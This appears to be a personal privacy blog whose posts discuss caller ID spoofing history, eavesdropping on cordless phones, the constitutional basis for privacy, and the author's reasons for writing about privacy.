It didn’t take long for phone phreaks (think of them as the hackers of today only they focused on manipulating phone systems and had their heyday in the 80s and 90s) to figure out how this system worked and how to manipulate it. At first this was through phone redirectors (such as calling card dialups) but these always showed the number that was the dialup (much like calling cards today or calls from a corporate PBX). Since even this gave away some information, others people found ways to double transmit the caller ID info to overwrite the original signal with new data, or loop though a PBX programmed to send whatever caller ID info the caller wanted (services like this are still advertised on the internet). It didn’t take long for telemarketers to pick up these techniques as a way to get people to answer their phones (this was pre-call block list). Because of this spoofing, various laws were considered to make spoofing your caller ID information a crime (in my mind this is a little like saying we would prosecute John Jay, Alexander Hamilton and James Madison (the writers of the federalist papers) for signing them PUBLIUS or for not identifying yourself to the police (strangely enough there was a case on this where the court said you do have to give your name to the police (2004 Supreme Court decision in the Hiibel case)).

Today concerns of phone numbers being used for discrimination are mostly assuaged since the ubiquitous use of cell phone, number portability, and pay as you go SIM cards that make phone numbers almost meaningless. There are new issues arising though. Some services (twitter.com an obvious example) rely on caller ID for a personal identifier (login credentials). Caller ID spoofing allows people to manipulate such tools and the government is moving (along with private groups) to stop this. It is a trade-off, of anonymity for utility. What should be most concerning is how this evolution of technology has kept one thing stable; government control. With each step in this process, the public has given up some of its privacy/anonymity in exchange for not just security, but in some cases convenience (a common theme in privacy issues). What is more disturbing is that with each of these steps, the government has been able to protect its interests. In a way this allows the government to ensure that private groups can not oppose it because they have a different set of rules to play by than the rest of us.

In hindsight; caller ID is an interesting case; it’s gone from a screening tool, and fears of discrimination, to a tool of identification which is being legislated from being faked. It is a technology that can be hidden from private parties, but not the government (and in that is the concern). Information in the hands of a benevolent government can forward the public interest, but if such a government were to want to use that information against its people, having such access allows another level of control over the population. Our forefathers designed a country to have protected rights because they had grave concerns about the abuses of power by the government. We should think about what tradeoffs we are making with our decisions and how those decisions shift the balance of power.

Cordless Phones: All your base (stations) belong to us

Everyone knows that eavesdropping isn’t polite. We’ve also all had the experience of accidentally overhearing something in a conversation (in many cases out of context). Since we can hardly hold people accountable for hearing what others say within earshot, we are usually on our own to protect our privacy in such situations. This becomes a bit more complicated when you put a phone into the mix. The transmission of a phone conversation across the telephone lines is a protected form of confidential speech and recording such conversations is illegal without consent (in some states you need one party (or a judge’s order) in others, like California, you need both parties consent (or a judge’s order)). These wiretapping provisions also applied to wireless phone transmissions. What is interesting is although the government may need a warrant to listen in to your wired phone call conversations (called land lines) they (eavesdroppers) do not to listen in to your wireless calls (http://caselaw.lp.findlaw.com/casecode/uscodes/18/parts/i/chapters/119/sections/section_2510_notes.html). This is because the law says so but from a practical matter it is because wireless calls are broadcast and thus anyone who can receive that broadcast can listen in to what you are saying. Since you are broadcasting, you have no reasonable expectation of privacy (well talk more about this in another posting).

In the 80s and 90s this meant not only government listening to people’s phone calls became much easier, but that private parties could listen in with greater ease (note, there is a distinction between what people.govt. can do, and what they can do legally. Recording something might put you (or the govt. afowl of some laws, but it doesn’t stop information gathering, legal or otherwise). In many cases people would take a cordless phone handset and walk around their neighborhoods (a radio scanner would work as well) and just switch channels until they tuned into someone’s conversation. The handset method also allowed people to pickup unused base stations (where your phone rests to recharge) and use their line to make long distance calls for free (or local calls that were much harder to trace to the person making the call). Several advancements over the years have made this more difficult. Phones have moved to new frequencies (higher frequencies mean people need newer equipment to listen in but the greater range for your phone, the farther away an eavesdropper can be). Phones also started blocking the base station if the phone was in the charger (a modest improvement). Another improvement was frequency hopping (exactly what it sounds like). Perhaps the biggest change was the move to spread spectrum technology.

Spread spectrum technology spreads the conversation out over the entire frequency band. This prevents traditional monitoring tactics as any one frequency doesn’t show enough signal to make it appear that there is anything being transmitted. This technology was used by the military in WWII and only in the 90s became civilian use technology.

What is of note of all of these changes is that all of them are still able to be intercepted (though private parties have to go through more, and more expensive, loops to continue to eavesdrop government surveillance still has the ability to listen in without the burdens of a warrant that land lines require. What is also worthy of note, is that although the technology has evolved, the one thing that would seem to be the most effective way to protect the privacy of phone users (encryption) has never been offered (Another article will discuss encryption of communications).

From the user’s perspective, the critical thing here is that you are most protected from privacy invasion in your phone calls by using traditional land line communications. When you add the convenience of wireless, you are giving up some of the potential privacy of your conversation.

If privacy is so important, why didn’t our founding fathers write it into the constitution or the bill or rights?

Ok, let’s start the way all my favorite folks started, by answering a question with a question. That question is, “How many of our founding fathers signed the original Declaration of Independence?” Seems simple right? After all we’ve seen that document with that big John Hancock signature at the bottom. But how many of them signed the original document? The question is a bit of a trick, since we know there is a huge list (56) of them that eventually signed it. The trick is that they signed it in August after the first draft was distributed (the original was only signed by two people). Why? Well for one, because signing such a document would be considered an act of treason and as Benjamin Franklin reminded those at the signing that,”We must all hang together, or we shall surely hang separately.” The privacy and anonymity of their thoughts and speech was clearly something that was top of mind for these men.

The Supreme Court has referred to a right of privacy on many occasions and in most of these, the fourth amendment is the usual starting point. For those that are trying to remember their civics lessons, that’s the one that says that you should be protected from unreasonable search and seizure (technically this only applied to the federal government but the 14^th amendment expanded this to protection from state’s governments as well).

This is where it gets much grayer. Some people view the fourth amendment as meaning what it says with not logical extrapolation or allowances for changes in technology. Others feel that this expresses intent and should expand to encompass new technologies and realities. The Supreme court over the years has expressed opinions ranging the gambit on this issue so it is safe to say that this is an undecided issue (as an aside, Row V. Wade is actually based on a right to privacy). Thus, this is where the debate about whether we have a right to privacy or not, and to what extent it goes comes from. In later blogs we will look at what this means from the standpoint of private citizens and corporations (which the law treats as citizens).

Why does privacy matter?

One of the questions a number of people have posed to me is, “Don’t only those who have something to hide need to worry?” To this I offer some sad reminders of history that are probably best summarized in Martin Niemöller’s famous poem about those who came for the communists, Jews and socialists, and his inaction on these occasions leading to the time when they came for him; and how there was no one left to stand up for him. It’s a statement about solidarity against power but it’s also a statement about privacy. Some group affiliations are obvious (race and gender being examples) while others are less so (sexual orientation, religion, political affiliation). All of these have been (or currently are being) used by those in power (or seeking power) to exclude, intimidate, attack or marginalize group who oppose them. Here in the United States, having the name Mohamed on Sept. 10^th 2001 wouldn’t have bothered too many people in the US. It certainly wouldn’t have caused any extra scrutiny in your life. All of that would have change in less than 24 hrs. The cautionary tale here is that even those who feel they don’t have anything to hide can find that they do have something about them that they don’t wish to be public if circumstances change.

A society without privacy will almost certainly regress to a set of accepted social norms. Those in that society then face the challenge or deciding if they want to try and change those social norms (which invariably has a high cost to your own self in matters of persecution, intimidation as well as possible imprisonment or death). Few people are willing to undertake such sacrifice, and thus how the social norms can be enforced. If you do not want a diverse society, this indeed may seem like a benefit; at least until the society decides that you are now part of those who are unaffiliated with its new social norm. Think that can’t happen; look at Jews in Germany circa 1930 v 1940, look at the Japanese in the US over the same period.

Many things are changing in our world. With the growth of our surveillance society, and the changing nature of what is considered constitutionally protected; not to mention the growth of data collation technology in the hands of private parties, we will all face a set of questions around privacy in our lives that previous generations never had to face. Those issues will range from when a police officer can search you, to how long a company can keep records of where you went on the Internet. We will all live more public lives than any other generation in history whether we like it or not. We all do things that some day we may not want to be reminded of, let alone have available to the public (for me I think some of my college stunts and Jr. High clothing selections fall into a slightly innocuous, though no less serious, collection of things I’d rather keep private). In any event, since employers have started to run background checks (including credit checks) on employees, the government is looking at library checkouts and advertising companies are monitoring what websites you go to; you may want to ask yourself, "Is this information I really want anyone/everyone to have?" If your answer is the predictable, “No, it’s private” then you grasp why privacy is important.

Why am I writing my personal thoughts on private issues?

If you’re reading this, I’m going to assume that you have at least a curiosity about privacy. Indeed it’s an issue that many of us take for granted while we concurrently give away more data than we realize. Many people have written about this topic and have approached it, in my own thinking, from many different angles. My intent with this blog is simply to chronicle the things that I come across in the realm of privacy and my evolving ideas on the point. Why am I doing this? Well, I think it’s something that many people don’t think too much about until it’s too late. Weather you jealously guard your privacy, fiercely manage your image (can you say Politicians; I knew you could) or you live an open-book life (Twitter and MySpace users come to mind) the concepts of privacy play a role in who we are and how we will be perceived. Indeed the use of this kind of information may indeed become the most important impact on many of our lives in the coming decades.

The danger in letting something private out is that is it almost impossible to ever make it private again. Like the genie in the bottle; once something is in the “open” it is almost impossible to put it back in the bottle. Opening up the Pandora’s box of privacy may bring forth unknown consequence that we only fully appreciate after the damage has been done.

I don’t consider myself much of a conspiracy theorist and I’m not a zealot who envisions an Orwellian future, but I am someone who thinks that far too few people really think about their privacy and what it is really worth. Many more don’t really think about what leading a public life will mean to society. It is these issues that I think need to be raised and discussed; then as a society we can decide what we want to allow. I believe in an informed populous but those who seek to violate others privacy rarely advertise their actions. My hope is that we will never end up in a world where our private information is used against us but this might be a bit naive (after all, there are more than a few examples of this kind of thing (Ted Haggard, come on down!)).

So it is with the dual goals of bringing my thoughts on privacy to the public (the irony is not lost on me) in hopes of furthering the public debate on the idea, as well as to inform those who are interested in what some of the privacy issues in our world are that you might not know about that I decided to start this blog. I am not a professional blogger but you are welcome to comment here in the blog or email me personally.